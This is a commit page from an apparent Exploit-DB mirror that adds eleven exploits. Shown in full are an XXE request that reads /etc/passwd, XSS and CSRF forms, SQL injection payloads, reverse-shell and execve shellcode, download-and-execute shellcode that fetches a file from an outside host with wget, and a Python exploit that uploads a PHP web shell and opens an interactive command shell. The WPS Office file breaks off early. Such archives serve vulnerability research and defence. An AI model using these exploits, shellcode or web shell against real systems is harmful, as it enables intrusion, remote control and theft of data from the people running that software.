bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-02-02

Browse source 
11 new exploits
This commit is contained in:
Offensive Security 2016-02-02 05:02:47 +00:00
parent acd2ef293c
commit 2ec2bcdde4
12 changed files with 1183 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

11
files.csv
View file

@ -32489,6 +32489,7 @@ id,file,description,date,author,platform,type,port
36036,platforms/php/webapps/36036.txt,"BlueSoft Rate My Photo Site 'ty' Parameter SQL Injection Vulnerability",2011-08-08,darkTR,php,webapps,0
36037,platforms/multiple/dos/36037.txt,"Adobe Flash Media Server <= 4.0.2 NULL Pointer Dereference Remote Denial of Service Vulnerability",2011-08-09,"Knud Erik Hojgaard",multiple,dos,0
36038,platforms/php/webapps/36038.txt,"WordPress eShop Plugin 6.2.8 - Multiple Cross Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0
39386,platforms/php/webapps/39386.txt,"iScripts EasyCreate 3.0 - Multiple Vulnerabilities",2016-02-01,"Bikramaditya Guha",php,webapps,80
36042,platforms/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure Vulnerability",2015-02-10,"Yakir Wizman",hardware,webapps,0
36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart - Unrestricted File Upload",2015-02-10,metasploit,php,webapps,80
36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 - 'ffgb_admin.php' Remote File Include Vulnerability",2011-08-11,"RiRes Walid",php,webapps,0
@ -35625,3 +35626,13 @@ id,file,description,date,author,platform,type,port
39382,platforms/multiple/webapps/39382.txt,"SAP HANA 1.00.095 - hdbindexserver Memory Corruption",2016-01-28,ERPScan,multiple,webapps,0
39383,platforms/lin_x86-64/shellcode/39383.c,"x86_64 Linux shell_reverse_tcp with Password - Polymorphic Version",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
39385,platforms/php/webapps/39385.txt,"ProjectSend r582 - Multiple Vulnerabilities",2016-01-29,"Filippo Cavallarin",php,webapps,80
39387,platforms/php/webapps/39387.py,"iScripts EasyCreate 3.0 - Remote Code Execution Exploit",2016-02-01,"Bikramaditya Guha",php,webapps,80
39388,platforms/lin_x86-64/shellcode/39388.c,"x86_64 Linux shell_reverse_tcp with Password - Polymorphic Version v2",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
39389,platforms/lin_x86/shellcode/39389.c,"Linux x86 Download & Execute Shellcode",2016-02-01,B3mB4m,lin_x86,shellcode,0
39390,platforms/lin_x86-64/shellcode/39390.c,"x86_64 Linux Polymorphic Execve-Stack - 47 bytes",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
39391,platforms/java/webapps/39391.txt,"Hippo CMS 10.1 - Multiple Vulnerabilities",2016-02-01,LiquidWorm,java,webapps,80
39393,platforms/windows/dos/39393.txt,"Autonics DAQMaster 1.7.3 - DQP Parsing Buffer Overflow Code Execution",2016-02-01,LiquidWorm,windows,dos,0
39395,platforms/windows/dos/39395.txt,"WPS Office < 2016 - .ppt Heap Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0
39396,platforms/windows/dos/39396.txt,"WPS Office < 2016 - .doc OneTableDocumentStream Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0
39397,platforms/windows/dos/39397.txt,"WPS Office < 2016 - .ppt drawingContainer Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0
39398,platforms/windows/dos/39398.txt,"WPS Office < 2016 - .xls Heap Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0

Can't render this file because it is too large.

179
platforms/java/webapps/39391.txt Executable file
View file

@ -0,0 +1,179 @@

Hippo CMS 10.1 XML External Entity Information Disclosure Vulnerability
Vendor: Hippo B.V.
Product web page: http://www.onehippo.org
Affected version: 10.1, 7.9 and 7.8 (Enterprise Edition)
Summary: Hippo CMS is an open source Java CMS. We built it so you
can easily integrate it into your existing architecture.
Desc: XXE (XML External Entity) processing through upload of SVG
images in the CMS, and through XML import in the CMS Console application.
Tested on: Linux 2.6.32-5-xen-amd64
Java/1.8.0_66
Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5301
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5301.php
Vendor: http://www.onehippo.org/security-issues-list/security-12.html
http://www.onehippo.org/about/release-notes/10/10.1.2-release-notes.html
04.12.2015
---
[Request]:
POST /?1-8.IBehaviorListener.0-root-tabs-panel~container-cards-2-panel-center-tabs-panel~container-cards-3-panel-editor-extension.editor-form-template-view-3-item-view-1-item-extension.upload-fileUpload-form-fileUpload HTTP/1.1
Host: 10.0.2.17
User-Agent: ZSL_Web_Scanner/2.8
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: https://10.0.2.17/?1&path=/content/gallery/test4.svg
Content-Length: 2101
Content-Type: multipart/form-data; boundary=---------------------------20443294602274
Cookie: [OMMITED]
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------20443294602274
Content-Disposition: form-data; name="id1a0_hf_0"
-----------------------------20443294602274
Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:1:item
:view:1:item:value:widget"
-----------------------------20443294602274
Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:2:item
:view:1:item:view:1:item:view:1:item:value:widget"
-----------------------------20443294602274
Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:view:2:item
:view:1:item:view:2:item:view:1:item:value:widget"
-----------------------------20443294602274
Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left
:view:1:item:view:1:item:value:widget"
asd
-----------------------------20443294602274
Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left
:view:2:item:view:1:item:value:widget"
hhh
-----------------------------20443294602274
Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.left
:view:3:item:view:1:item:panel:editor"
-----------------------------20443294602274
Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.right
:view:2:item:view:1:item:value:widget"
hhh
-----------------------------20443294602274
Content-Disposition: form-data; name="cards:1:panel:editor:extension.editor:form:template:extension.right
:view:3:item:view:1:item:value:widget"
hhhh
-----------------------------20443294602274
Content-Disposition: form-data; name="files[]"; filename="svgupload2.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="yes"?><!DOCTYPE zsl [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]
><svg width="500px" height="40px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999
/xlink" version="1.1">&xxe;</svg>
-----------------------------20443294602274--
[Response]:
<?xml version="1.0" encoding="UTF-8"?><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www
.w3.org/1999/xlink" height="7" version="1.1" viewBox="0 0 500.0 40.0" width="98">
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
***
***
***
***
</svg>
###############################################################################
<!--
Hippo CMS 10.1 Stored Cross-Site Scripting Vulnerability
Vendor: Hippo B.V.
Product web page: http://www.onehippo.org
Affected version: 10.1, 7.9 and 7.8 (Enterprise Edition)
Summary: Hippo CMS is an open source Java CMS. We
built it so you can easily integrate it into your
existing architecture.
Desc: Hippo CMS suffers from a stored XSS vulnerability.
Input passed thru the POST parameters 'groupname' and
'description' is not sanitized allowing the attacker to
execute HTML code into user's browser session on the
affected site.
Tested on: Linux 2.6.32-5-xen-amd64
Java/1.8.0_66
Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5300
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5300.php
Vendor: http://www.onehippo.org/security-issues-list/security-12.html
http://www.onehippo.org/about/release-notes/10/10.1.2-release-notes.html
04.12.2015
-->
<html>
<body>
<form action="https://10.0.2.17/?1-1.IBehaviorListener.0-root-tabs-panel~container-cards-6-panel-panel-form-create~button" method="POST">
<input type="hidden" name="id26c_hf_0" value="" />
<input type="hidden" name="groupname" value="<img src=ko onerror=confirm(document.cookie)>" />
<input type="hidden" name="description" value="<img src=ko onerror=confirm(2)>" />
<input type="hidden" name="create-button" value="1" />
<input type="submit" value="Inject code" />
</form>
</body>
</html>

113
platforms/lin_x86-64/shellcode/39388.c Executable file
View file

@ -0,0 +1,113 @@
/*---------------------------------------------------------------------------------------------------------------------
/*
*Title: tcp reverse shell with password polymorphic version v2 135 bytes
*Author: Sathish kumar
*Contact: https://www.linkedin.com/in/sathish94
*Copyright: (c) 2016 iQube. (http://iQube.io)
*Release Date: January 29, 2016
*Description: x64 Linux reverse TCP port shellcode on port 4444 with reconfigurable password
*Tested On: Ubuntu 14.04 LTS
*SLAE64-1408
*Build/Run: gcc -fno-stack-protector -z execstack filename.c -o filename
* ./bindshell
* nc -l 4444 -vvv
*
global _start
_start:
xor rax, rax ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
xor rsi, rsi
mul rsi
push byte 0x2 ;pusing argument to the stack
pop rdi ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
inc esi ; already rsi is 0 so incrementing the rsi register will make it 1
push byte 0x29 ; pushing the syscall number into the rax by using stack
pop rax
syscall
; copying the socket descripter from rax to rdi register so that we can use it further
xchg rax, rdi
; server.sin_family = AF_INET
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = INADDR_ANY
; bzero(&server.sin_zero, 8)
; setting up the data sctructure
xor rax, rax
push rax ; bzero(&server.sin_zero, 8)
mov ebx , 0xfeffff80 ; ip address 127.0.0.1 "noted" to remove null
not ebx
mov dword [rsp-4], ebx
sub rsp , 4 ; adjust the stack
xor r9, r9
push word 0x5c11 ; port 4444 in network byte order
push word 0x02 ; AF_INET
push rsp
pop rsi
push 0x10
pop rdx
push 0x2a
pop rax
syscall
push 0x3
pop rsi ; setting argument to 3
duplicate:
dec esi
mov al, 0x21 ;duplicate syscall applied to error,output and input using loop
syscall
jne duplicate
password_check:
push rsp
pop rsi
xor rax, rax ; system read syscall value is 0 so rax is set to 0
syscall
push 0x6b636168 ; password to connect to shell is hack which is pushed in reverse and hex encoded
pop rax
lea rdi, [rel rsi]
scasd ; comparing the user input and stored password in the stack
execve:
xor esi, esi
xor r15, r15
mov r15w, 0x161f
sub r15w, 0x1110
push r15
mov r15, rsp
mov rdi, 0xff978cd091969dd0
inc rdi
neg rdi
mul esi
add al, 0x3b
push rdi
push rsp
pop rdi
call r15
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] =\
"\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x48\x31\xc0\x50\xbb\x80\xff\xff\xfe\xf7\xd3\x89\x5c\x24\xfc\x48\x83\xec\x04\x4d\x31\xc9\x66\x68\x11\x5c\x66\x6a\x02\x54\x5e\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x54\x5e\x48\x31\xc0\x0f\x05\x68\x68\x61\x63\x6b\x58\x48\x8d\x3e\xaf\x31\xf6\x4d\x31\xff\x66\x41\xbf\x1f\x16\x66\x41\x81\xef\x10\x11\x41\x57\x49\x89\xe7\x48\xbf\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48\xff\xc7\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x41\xff\xd7";
main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

52
platforms/lin_x86-64/shellcode/39390.c Executable file
View file

@ -0,0 +1,52 @@
/*---------------------------------------------------------------------------------------------------------------------
/*
*Title: x86_64 linux Polymorphic execve-stack 47 bytes
*Author: Sathish kumar
*Contact: https://www.linkedin.com/in/sathish94
* Copyright: (c) 2016 iQube. (http://iQube.io)
* Release Date: January 6, 2016
*Description: X86_64 linux Polymorphic execve-stack 47 bytes
*Tested On: Ubuntu 14.04 LTS
*SLAE64-1408
*Build/Run: gcc -fno-stack-protector -z execstack sellcode.c -o shellcode
* ./shellcode
*
global _start
_start:
xor esi, esi
xor r15, r15
mov r15w, 0x161f
sub r15w, 0x1110
push r15
mov r15, rsp
mov rdi, 0xff978cd091969dd0
inc rdi
neg rdi
mul esi
add al, 0x3b
push rdi
push rsp
pop rdi
call r15
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xf6\x4d\x31\xff\x66\x41\xbf\x1f\x16\x66\x41\x81\xef\x10\x11\x41\x57\x49\x89\xe7\x48\xbf\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48\xff\xc7\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x41\xff\xd7";
main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

99
platforms/lin_x86/shellcode/39389.c Executable file
View file

@ -0,0 +1,99 @@
/*
--------------------------------------------------------------------------------------------------------
[+] Author : B3mB4m
[~] Contact : b3mb4m@protonmail.com
[~] Project : https://github.com/b3mb4m/Shellsploit
[~] Greetz : Bomberman,T-Rex,KnocKout,ZoRLu
[~] Poc : http://imgur.com/hHB4yiQ
#We are still working on ROP Chain, stay tuned :)
"""
You can convert it an elf file:
https://www.virustotal.com/en/file/93c214f7b4362937f05f5732ba2f7f1db53e2a5775ab7bafdba954e691f74c82/analysis/1454113925/
If you want test:
Important : your filename len must be one byte(Weird bug I'll fix it
soon lol).
Default settings for http://b3mb4m.github.io/exec/h
Source codes : b3mb4m.github.io/exec/hello.asm
"""
00000000 31C0 xor eax,eax
00000002 B002 mov al,0x2
00000004 CD80 int 0x80
00000006 31DB xor ebx,ebx
00000008 39D8 cmp eax,ebx
0000000A 743B jz 0x47
0000000C 31C9 xor ecx,ecx
0000000E 31DB xor ebx,ebx
00000010 31C0 xor eax,eax
00000012 6A05 push byte +0x5
00000014 89E1 mov ecx,esp
00000016 89E1 mov ecx,esp
00000018 89E3 mov ebx,esp
0000001A B0A2 mov al,0xa2
0000001C CD80 int 0x80
0000001E 31C9 xor ecx,ecx
00000020 31C0 xor eax,eax
00000022 50 push eax
00000023 B00F mov al,0xf
00000025 6A68 push byte +0x68
00000027 89E3 mov ebx,esp
00000029 31C9 xor ecx,ecx
0000002B 66B9FF01 mov cx,0x1ff
0000002F CD80 int 0x80
00000031 31C0 xor eax,eax
00000033 50 push eax
00000034 6A68 push byte +0x68
00000036 89E3 mov ebx,esp
00000038 50 push eax
00000039 89E2 mov edx,esp
0000003B 53 push ebx
0000003C 89E1 mov ecx,esp
0000003E B00B mov al,0xb
00000040 CD80 int 0x80
00000042 31C0 xor eax,eax
00000044 40 inc eax
00000045 CD80 int 0x80
00000047 6A0B push byte +0xb
00000049 58 pop eax
0000004A 99 cdq
0000004B 52 push edx
0000004C 6865632F68 push dword 0x682f6365
00000051 682F2F6578 push dword 0x78652f2f
00000056 68622E696F push dword 0x6f692e62
0000005B 6869746875 push dword 0x75687469
00000060 68346D2E67 push dword 0x672e6d34
00000065 6862336D62 push dword 0x626d3362
0000006A 89E1 mov ecx,esp
0000006C 52 push edx
0000006D 6A74 push byte +0x74
0000006F 682F776765 push dword 0x6567772f
00000074 682F62696E push dword 0x6e69622f
00000079 682F757372 push dword 0x7273752f
0000007E 89E3 mov ebx,esp
00000080 52 push edx
00000081 51 push ecx
00000082 53 push ebx
00000083 89E1 mov ecx,esp
00000085 CD80 int 0x80
*/
//Project : https://github.com/b3mb4m/Shellsploit
//This file created with shellsploit ..
//30/01/2016 - 02:59:21
//Compile : gcc -fno-stack-protector -z execstack shell.c -o shell
unsigned char shellcode[] =
"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31\xc0\x50\xb0\x0f\x6a\x68\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50\x6a\x68\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52\x68\x65\x63\x2f\x68\x68\x2f\x2f\x65\x78\x68\x62\x2e\x69\x6f\x68\x69\x74\x68\x75\x68\x34\x6d\x2e\x67\x68\x62\x33\x6d\x62\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";
int main(void){
(*(void(*)()) shellcode)();
}

143
platforms/php/webapps/39386.txt Executable file
View file

@ -0,0 +1,143 @@
iScripts EasyCreate 3.0 Multiple Vulnerabilities
[Vendor Product Description]
- iScripts EasyCreate is a private label online website builder. This software allows you to start an
online business by offering website building services to your customers. Equipped with drag and drop
design functionality, crisp templates and social sharing capabilities, this online website builder
software will allow you to provide the best website building features to your users.
- Site: http://www.iscripts.com
[Advisory Timeline]
[17.11.2015] First contact to vendor.
[08.12.2015] Follow up with vendor. No response received.
[08.12.2015] Ticket Created using online portal (id #010248399110346).
[08.12.2015] Ticket closed by vendor without requesting vulnerability details.
[28.12.2015] Vendor responds asking more details.
[29.12.2015] Sent details to the vendor.
[05.01.2016] Follow up with vendor. No response received.
[14.01.2016] Follow up with vendor. No response received.
[28.01.2016] Public Security advisory released.
[Bug Summary]
- SQL Injection
- Cross Site Scripting (Stored)
- Cross Site Scripting (Reflected)
- Cross Site Request Forgery
[Impact]
- High
[Affected Version]
- EasyCreate 3.0
[Advisory]
- ZSL-2016-5298
- http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5298.php
[Bug Description and Proof of Concept]
1. Cross-Site Request Forgery (CSRF) - The application allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be exploited to perform certain actions
with administrative privileges if a logged-in user visits a malicious web site
https://en.wikipedia.org/wiki/Cross-site_request_forgery
2. Cross Site Scripting (XSS) - Multiple cross-site scripting vulnerabilities were also discovered. The issue is
triggered when input passed via multiple parameters is not properly sanitized before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
https://en.wikipedia.org/wiki/Cross-site_scripting
3. SQL Injection - iScripts EasyCreate suffers from a SQL Injection vulnerability. Input passed via a GET
parameter is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited
to manipulate SQL queries by injecting arbitrary SQL code.
https://en.wikipedia.org/wiki/SQL_injection
[Proof-of-Concept]
1. SQL Injection
Parameter:
siteid (GET)
Payload:
action=editsite&siteid=6 AND (SELECT 3405 FROM(SELECT COUNT(*),CONCAT(0x71716b6a71,(SELECT (ELT(3405=3405,1))),0x71627a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2. Multiple Stored Cross Site Scripting
Parameter:
siteName (POST)
Payload:
Content-Disposition: form-data; name="siteName"
<script>alert(1)</script>
Parameter:
selectedimage (POST)
Payload:
selectedimage=<script>alert(1)</script>
Parameter:
filename (POST)
Payload:
filename=<script>alert(1)</script>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
3. Multiple Reflected Cross Site Scripting
Parameter
catid (GET)
Parameters
selectedimage, description, keywords, robotans, refreshans, authorans, copyrightans, revisitans, cmbSearchType (POST)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
4. Multiple Cross Site Request Forgery (CSRF)
Sample Payload for editing profile:
<html>
<body>
<form action="http://localhost/easycreate/demo/editprofile.php?act=post" method="POST">
<input type="hidden" name="vuser&#95;login" value="user" />
<input type="hidden" name="vuser&#95;name" value="Demo&#32;User" />
<input type="hidden" name="vuser&#95;lastname" value="PWNED" />
<input type="hidden" name="vuser&#95;email" value="demo&#64;demo&#46;com" />
<input type="hidden" name="vuser&#95;address1" value="a" />
<input type="hidden" name="vcity" value="" />
<input type="hidden" name="vstate" value="" />
<input type="hidden" name="vcountry" value="United&#32;States" />
<input type="hidden" name="vzip" value="" />
<input type="hidden" name="vuser&#95;phone" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
All flaws described here were discovered and researched by:
Bikramaditya Guha aka "PhoenixX"

217
platforms/php/webapps/39387.py Executable file
View file

@ -0,0 +1,217 @@
#!C:/Python27/python.exe -u
#
#
# iScripts EasyCreate 3.0 Remote Code Execution Exploit
#
#
# Vendor: iScripts.com
# Product web page: http://www.iscripts.com
# Affected version: 3.0
#
# Summary: iScripts EasyCreate is a private label online website builder. This
# software allows you to start an online business by offering website building
# services to your customers. Equipped with drag and drop design functionality,
# crisp templates and social sharing capabilities, this online website builder
# software will allow you to provide the best website building features to your
# users.
#
# Desc: iScripts EasyCreate suffers from an authenticated arbitrary PHP code
# execution. The vulnerability is caused due to the improper verification of
# uploaded files in '/ajax_image_upload.php' script thru the 'userImages' POST
# parameter. This can be exploited to execute arbitrary PHP code by uploading
# a malicious PHP script file with '.php4' extension (to bypass the '.htaccess'
# block rule) that will be stored in '/uploads/siteimages/thumb/' directory.
#
# Tested on: Apache
# MySQL 5.5.40
#
# Vulnerability discovered by Bikramaditya 'PhoenixX' Guha
#
# Zero Science Lab - http://www.zeroscience.mk
# Macedonian Information Security Research And Development Laboratory
#
#
# Advisory ID: ZSL-2016-5297
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5297.php
#
#
# 17.11.2015
#
#
version = '3.0'
import itertools, mimetools, mimetypes
import cookielib, urllib, urllib2, sys
import logging, os, time, datetime, re
import requests, httplib
from colorama import Fore, Back, Style, init
from cStringIO import StringIO
from urllib2 import URLError
global file
file = 'abcde2'
init()
if os.name == 'posix': os.system('clear')
if os.name == 'nt': os.system('cls')
piton = os.path.basename(sys.argv[0])
def bannerche():
print '''
@-------------------------------------------------------------@
| iScripts EasyCreate 3.0 Remote Code Execution Exploit |
| ID: ZSL-2016-5297 |
| Copyleft (c) 2016, Zero Science Lab |
@-------------------------------------------------------------@
'''
if len(sys.argv) < 1:
print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <hostname>\n'
print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk\n'
sys.exit()
bannerche()
print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET
host = sys.argv[1]
cj = cookielib.CookieJar()
opener2 = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
opener2.open('http://'+host+'/easycreate/demo/login.php')
print '\x20\x20[*] Login please.'
username = raw_input('\x20\x20[*] Enter username: ')
password = raw_input('\x20\x20[*] Enter password: ')
login_data = urllib.urlencode({
'vuser_login' : username,
'vuser_password' : password,
})
login = opener2.open('http://'+host+'/easycreate/demo/login.php?act=post', login_data)
auth = login.read()
if re.search(r'Invalid username and', auth):
print '\x20\x20[*] Incorrect username or password '+'.'*24+Fore.RED+'[ER]'+Fore.RESET
print
sys.exit()
else:
print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET
response = opener2.open('http://'+host+'/easycreate/demo/usermain.php?succ=msg')
output = response.read()
for session in cj:
sessid = session.name
print '\x20\x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
cookie = ses_chk.group(0)
print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET
class MultiPartForm(object):
def __init__(self):
self.form_fields = []
self.files = []
self.boundary = mimetools.choose_boundary()
return
def get_content_type(self):
return 'multipart/form-data; boundary=%s' % self.boundary
def add_field(self, name, value):
self.form_fields.append((name, value))
return
def add_file(self, field_name, filename, fileHandle, mimetype=None):
body = fileHandle.read()
if mimetype is None:
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
self.files.append((field_name, filename, mimetype, body))
return
def __str__(self):
parts = []
part_boundary = '--' + self.boundary
parts.extend(
[ part_boundary,
'Content-Disposition: form-data; name="%s"; filename="%s"' % \
(field_name, filename),
'Content-Type: application/x-msdownload',
'',
body,
]
for field_name, filename, content_type, body in self.files
)
parts.extend(
[ part_boundary,
'Content-Disposition: form-data; name="%s"' % name,
'',
value,
]
for name, value in self.form_fields
)
flattened = list(itertools.chain(*parts))
flattened.append('--' + self.boundary + '--')
flattened.append('')
return '\r\n'.join(flattened)
if __name__ == '__main__':
form = MultiPartForm()
form.add_file('userImages', 'abcde2.php4',
fileHandle=StringIO('<?php system(\$_GET[\\\'cmd\\\']); ?>'))
request = urllib2.Request('http://'+host+'/easycreate/demo/ajax_image_upload.php')
request.add_header('User-agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0')
request.add_header('Referer', 'http://'+host+'/easycreate/demo/gallerymanager.php')
request.add_header('Accept-Language', 'en-US,en;q=0.5')
body = str(form)
request.add_header('Content-type', form.get_content_type())
request.add_header('Connection', 'keep-alive')
request.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')
request.add_header('Accept-Encoding', 'gzip, deflate')
request.add_header('Cookie', cookie)
request.add_header('Content-length', len(body))
request.add_data(body)
request.get_data()
urllib2.urlopen(request).read()
print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET
response = opener2.open('http://'+host+'/easycreate/demo/gallerymanager.php')
output = response.read()
for line in output.splitlines():
if file in line:
filename = str(line.split("=")[2:])[3:84]
print filename
print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET
raw_input()
while True:
try:
cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)
execute = opener2.open(filename+'cmd='+cmd)
reverse = execute.read()
print reverse
if cmd.strip() == 'exit':
break
except Exception:
break
sys.exit()

84
platforms/windows/dos/39393.txt Executable file
View file

@ -0,0 +1,84 @@

Autonics DAQMaster 1.7.3 DQP Parsing Buffer Overflow Code Execution
Vendor: Autonics Corporation
Product web page: https://www.autonics.com
Affected version: 1.7.3 (build 2454)
1.7.0 (build 2333)
1.5.0 (build 2117)
Summary: DAQMaster is comprehensive device management program
that can be used with Autonics thermometers, panel meters,
pulse meters, and counters, etc and with Konics recorders,
indicators. DAQMaster provides GUI control for easy and convenient
management of parameters and multiple device data monitoring.
Desc: The vulnerability is caused due to a boundary error in the
processing of a project file, which can be exploited to cause a
buffer overflow when a user opens e.g. a specially crafted .DQP
project file with a large array of bytes inserted in the 'Description'
element. Successful exploitation could allow execution of arbitrary
code on the affected machine.
---------------------------------------------------------------------
(ee8.1ee8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=57010748 ecx=02bb9a00 edx=00808080 esi=00000001 edi=00000001
eip=00405d45 esp=0018f59c ebp=0018f91c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
DAQMaster!TClsValueListShowData$qqrp16GraphicsTBitmapip10TPropValuei+0x41d:
00405d45 8b10 mov edx,dword ptr [eax] ds:002b:41414141=????????
---------------------------------------------------------------------
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5302
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5302.php
20.11.2015
--
thricer.dqp project PoC:
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39393.zip
------------------------
<DAQMaster xmlns="http://www.w3.org/2001/XMLSchema-instance">
<Project>
<General>
<Name>Noname</Name>
<Company></Company>
<Worker></Worker>
<Description>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...[n]</Description>
<DataFolder>C:\Users\zslab\Documents</DataFolder>
<DeskLayout>0</DeskLayout>
<NameRule></NameRule>
<FileType>0</FileType>
<RunMode>0</RunMode>
<Schedule Active="0"/>
<Layout>0</Layout>
</General>
<System/>
<UserTag/>
<DDEServer/>
<WorkSpace WorkSpaceNum="1">
<WorkSpace>DAQ WorkSpace</WorkSpace>
</WorkSpace>
<UIList/>
<Layout/>
</Project>
</DAQMaster>

71
platforms/windows/dos/39395.txt Executable file
View file

@ -0,0 +1,71 @@
#####################################################################################
Application: WPS Office
Platforms: Windows
Versions: Version before 2016
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
WPS Office (an acronym for Writer, Presentation and Spreadsheets,[2] previously known as Kingsoft Office) is an office
